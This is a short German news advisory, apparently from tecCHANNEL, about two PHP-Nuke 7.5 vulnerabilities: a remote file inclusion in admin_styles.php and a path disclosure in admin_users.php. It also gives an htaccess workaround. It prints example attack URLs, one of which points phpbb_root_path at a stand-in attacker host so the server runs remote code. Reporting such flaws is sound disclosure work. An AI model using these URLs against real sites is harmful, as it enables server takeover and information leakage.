Hochkritische Lücke in PHP-Nuke

In dem bekannten Content Management System PHP-Nuke sind schwere Sicherheitslücken aufgetaucht. Angreifer können sie nutzen, um eigene Dateien auf dem Webserver einzuschleusen oder an eigentlich verborgene Daten zu gelangen.

Der Sicherheitsexperte Silentium hat die beiden Fehler entdeckt. Der erste ist in der Datei admin_styles.php enthalten. Die Variable "$phpbb_root_path" greift dabei auf die Datei common.php zurück. Der Aufruf lässt sich dabei aber so abändern, dass das Script eine speziell vom Angreifer präparierte Datei ausführt. So ist es möglich, auf dem angegriffenen Webserver beliebigen Code auszuführen. Ein Beispielangriff würde wie folgt aussehen: http://www.opfer.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://angreifer/

Die zweite Lücke erlaubt es, den kompletten Installationspfad von PHP-Nuke auszulesen. Dazu muss lediglich der Parameter "phpEx" mit einem ungültigen Wert aufgerufen werden. Dies stellt zwar keine direkte Gefahr dar, doch lässt sich so viel über den Aufbau des Webservers in Erfahrung bringen. Silentium hat auch hier einen Beispielangriff aufgeführt: http://www.opfer.com/modules/Forums/admin/admin_users.php?phpEx=silentium

Betroffen ist auf jeden Fall die Version 7.5. Andere Versionen könnten jedoch ebenfalls betroffen sein. Als Work-around kann der Zugriff auf die administrativen Scripts via htaccess beschränkt werden.

Über aktuelle Sicherheitslücken informieren Sie die Security Reports von tecCHANNEL in Kooperation mit Secunia. Sie können diesen Dienst auch als kostenlosen Newsletter oder tägliche Übersicht abonnieren. Premium-Kunden haben zudem die Möglichkeit, sich bei hochkritischen Lücken per Security Alert informieren zu lassen. (mja)

tecCHANNEL Buch-Shop

Literatur zum Thema IT-Sicherheit

Titelauswahl

Titel von Pearson Education

Bücher

PDF-Titel (50% billiger als Buch)

Downloads